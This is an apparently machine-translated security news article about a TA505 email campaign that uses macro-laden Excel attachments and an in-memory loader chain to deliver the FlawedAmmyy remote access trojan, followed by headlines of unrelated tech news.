Monday, July 6, 22:33 p.m.
Home security FlawedAmmyy RAT is transmitted through a malware campaign

FlawedAmmyy RAT is transmitted through a malware campaign

RAT

As warned by Microsoft, a newly discovered malicious campaign, targets its victims' systems to spread the notorious FlawedAmmmy RAT directly into memory.

FlawedAmmyy is one Trojan Remote Access (RAT), which allows attackers to gain full access to their victims' machines and move sideways to a network.

Trojan can intercept important information from a system such as login files and credentials, extract screenshots, and even allow a hacker to have access to the victim's computer camera.

The malicious agent associated with older campaigns that attempted to develop this malware is TA505, which is best known for distributing Dridex banking Trojan and ransomware Locky.

According to Microsoft reports, the attack begins with the sending of malicious emails containing attachments in .xls and Korean content.

As soon as the user opens the file, it automatically starts a macro operation to execute the legitimate msiexec.exe tool, which in turn downloads an MSI file.

Within this MSI file, attackers "hide an executable designed to decrypt and execute another executable file in memory as soon as it is opened.

“This executable file downloads and decrypts another file, wsus.exe, which you also digitally sign. Wsus.exe decrypts and runs the final payload directly to memory. The final payload is Trojan FlawedAmmyy ”explains Microsoft Security Intelligence in one tweet her.

Earlier this month, Trend Micro referred to TA505 campaigns targeting various Latin American and Asian countries with FlawedAmmyy RAT and other RATs, revealing that the same infection mechanism has been used for over two months.

In fact, the malicious agent uses it backdoors such as FlawedAmmyy, Remote Manipulator (RMS), ServHelper and more for more than 6 months.

LEAVE ANSWER

Please enter your comment!
Please enter your name here

Absent Mia
Absent Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greatest achievement

LIVE NEWS

Windows 10 2004: Unauthorized settings "block" the upgrade

Users report that they have a problem with Windows 10, since they are excluded from the application of the May 2020 update, when they manually attempt to ...
00:02:04

Lenovo is improving Linux ThinkPads but the problems remain

Last month, when Lenovo announced that it was going to certify the ThinkPad series for use with Linux operating systems, we thought directly ...

Nigerian accused of fraud against US companies

A Nigerian was taken to the federal court in Chicago on Friday, after being accused of coordinating an international cyber fraud system, which affected ...

Home routers display critical errors and run unpatched Linux

The German Fraunhofer Communication Institute (FKIE) conducted a survey that included 127 home routers from seven different brands, in an effort to ...

IPhone 12 release: Will we finally see it by the end of 2021?

New data on the release of the iPhone 12, which we all expect not to happen in September, say that it will only be delayed ...

MySQL: Replaces terms that reinforce racial discrimination

MySQL database developers have announced that they will be replacing terminology such as master, slave, blacklist, and whitelist.

The CEO of a cryptocurrency investment company was cheating

As reported by News24, Willie Breedt, the founder of VaultAge Solutions (cryptocurrency investment company), declared bankruptcy last week and the ...

United Kingdom: Will it exclude Huawei from its 5G networks?

The UK government has received an NCSC report on Huawei, which may change its policy ...

A Yahoo engineer is not in jail after hacking 6.000 accounts

A former Yahoo engineer has been sentenced to five years in prison for hacking into personal accounts ...

PoC exploits released for critical vulnerability on F5 BIG-IP devices

PoC exploits released for critical vulnerability on F5 BIG-IP devices Two days after the release of updates on critical vulnerability on F5 ...